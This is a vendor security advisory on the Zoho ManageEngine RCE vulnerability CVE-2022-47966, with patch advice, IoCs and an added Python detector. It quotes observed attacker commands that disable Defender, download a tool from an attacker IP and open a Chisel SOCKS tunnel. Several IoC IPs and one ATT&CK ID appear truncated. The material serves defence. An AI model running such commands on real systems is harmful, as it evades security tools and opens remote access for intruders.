Flash Notice: UPDATE - Zoho ManageEngine Vulnerability Exploited in the Wild

Written by Marketing | Jan 24, 2023 3:42:14 PM

UPDATE: 2/27/2023 - Last month, Avertium published the Flash Notice below regarding a Zoho ManageEngine vulnerability (CVE-2022-47966) being exploited in the wild. The vulnerability is a pre-authentication remote code execution flaw stemming from an outdated version of the Apache Santuario library and affects two dozen ManageEngine products.

While a patch is available, a growing number of threat actors are exploiting the flaw. CVE-2022-47966 allows unauthenticated attackers to take full control of a compromised system, and victims span the globe and a range of industries. Based on analysis by Bitdefender's researchers, 2,000 to 4,000 internet-accessible servers are still running at least one of the vulnerable versions of Apache Santuario.

Bitdefender noted that the existing PoC cannot exploit every server, since the target must have SAML configured. Even so, all businesses running vulnerable versions are strongly advised to patch immediately. See the link to ManageEngine's patch guidance in our original Flash Notice below.

UPDATED INDICATORS OF COMPROMISE (IoCs)

Overview

A vulnerability currently being exploited in the wild was found in two dozen ManageEngine products. CVE-2022-47966 is a pre-authentication remote code execution (RCE) vulnerability stemming from an outdated version of the Apache Santuario library.

CVE-2022-47966 impacts several popular products used by large organizations, including ServiceDesk Plus, ADSelfService Plus, Active Directory 360, Access Manager Plus, and others. Patches were released between October and November 2022, but the timing of the fixed-version release varies by product.

During testing, researchers from Rapid7 found that some products are easier to exploit than others. For example, the researchers stated that ServiceDesk Plus is easy to exploit with the proof-of-concept (PoC) code, but a successful attacker would need to obtain two additional pieces of information to modify the PoC.

As noted above, the root cause is an obsolete version of the Apache Santuario library, which implements XML security. The issue can be exploited with a SAML request carrying an invalid signature if SAML single sign-on is, or has ever been, enabled on the affected product.

Due to the popularity of ManageEngine solutions, a vulnerability such as CVE-2022-47966 puts organizations at serious risk by giving attackers initial access and the potential to move laterally using privileged credentials. Avertium recommends that all organizations using the affected products listed in ManageEngine's advisory patch immediately.

Avertium's Recommendations

Please read ManageEngine's advisory for updated product and version information, as well as patch guidance.

INDICATORS OF COMPROMISE (IoCs)

IP Addresses

  • 28.193[.]216
  • 93.193[.]64
  • 68.7[.]122

Post-Exploitation MITRE ATT&CK Techniques (observed by Rapid7)

  • 001 Defense Evasion: Disable / Modify Tools (disable Defender real-time monitoring)
    • Example:
      powershell -windowstyle hidden set-mppreference -disablerealtimemonitoring
      set-mppreference -exclusionpath c:\users\public

  • T1105 Ingress Tool Transfer: the PowerShell cmdlet Invoke-WebRequest (IWR) was used to download additional remote access tools
    • Example:
      invoke-webrequest -uri http://111.68.7[.]122:8081/svhost.exe

  • T1572 Protocol Tunneling: Chisel, a Golang implementation of a protocol tunneling tool similar to Plink, was used to tunnel traffic over a SOCKS proxy
    • Example:
      c:\users\public\svhost.exe client 111.68.7[.]122:8080 R:0.0.0.0:43566:socks
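As an added example (not from this notice or from Rapid7), the following Python scans constructed process-creation events for the three observed command patterns above and tags each hit with its technique label; the event field names and the java.exe parent-process heuristic are assumptions.

```python
import re
from typing import Dict, List

# Rules derived from the commands quoted in the notice: (label, regex over the command line).
RULES = [
    ("Defense Evasion: Disable/Modify Tools",
     re.compile(r"set-mppreference\s+-(disablerealtimemonitoring|exclusionpath)", re.I)),
    ("T1105 Ingress Tool Transfer",
     re.compile(r"\b(invoke-webrequest|iwr)\b.*\bhttps?://", re.I)),
    ("T1572 Protocol Tunneling (Chisel-style SOCKS client)",
     re.compile(r"\bclient\s+\S+:\d+\s+R:\S*:\d+:socks\b", re.I)),
]

# Constructed process-creation events for the demo; field names are an assumption,
# not a real log schema. The first three mirror the notice's examples (IoC IP
# refanged so it looks like a real log); the last is benign administration.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"host": "mgmt-srv-01", "parent": "java.exe",
     "cmd": "powershell -windowstyle hidden set-mppreference -disablerealtimemonitoring"},
    {"host": "mgmt-srv-01", "parent": "powershell.exe",
     "cmd": "invoke-webrequest -uri http://111.68.7.122:8081/svhost.exe "
            "-outfile c:\\users\\public\\svhost.exe"},
    {"host": "mgmt-srv-01", "parent": "cmd.exe",
     "cmd": "c:\\users\\public\\svhost.exe client 111.68.7.122:8080 R:0.0.0.0:43566:socks"},
    {"host": "ws-42", "parent": "explorer.exe", "cmd": "powershell Get-MpPreference"},
]


def match_event(event: Dict[str, str]) -> List[str]:
    """Return the labels of every rule whose regex matches the command line."""
    return [label for label, rx in RULES if rx.search(event["cmd"])]


def scan(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """One finding per matched event. Severity is raised when the parent is java.exe
    (assumption: the ManageEngine web application runs under Java, so a shell
    spawned from it points at exploitation rather than admin activity)."""
    findings = []
    for ev in events:
        labels = match_event(ev)
        if labels:
            severity = "high" if ev["parent"].lower() == "java.exe" else "medium"
            findings.append({"host": ev["host"], "parent": ev["parent"],
                             "severity": severity, "labels": labels, "cmd": ev["cmd"]})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['host']} {f['parent']} -> {f['labels']}: {f['cmd']}")
```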

How Avertium is Protecting Our Customers

  • Expanding endpoints, cloud computing environments, and accelerated digital transformation have decimated the perimeter in an ever-expanding attack surface. Avertium offers Attack Surface Management, so you’ll have no more blind spots, weak links, or fire drills.
  • Avertium recommends utilizing our service for DFIR (Digital Forensics and Incident Response) to help you rapidly assess, contain, eradicate, and recover from a security incident like a malware attack.
  • Avertium offers Vulnerability Management to provide a deeper understanding and control over organizational information security risks. If your enterprise is facing challenges with the scope, resources, or skills required to implement a vulnerability management program with your team, outsourced solutions can help you bridge the gap.

SUPPORTING DOCUMENTATION

CVE-2022-47966: Rapid7 Observed Exploitation of Critical ManageEngine Vulnerability | Rapid7 Blog

ManageEngine Security Advisories

PoC for critical ManageEngine bug to be released, so get patching! (CVE-2022-47966) - Help Net Security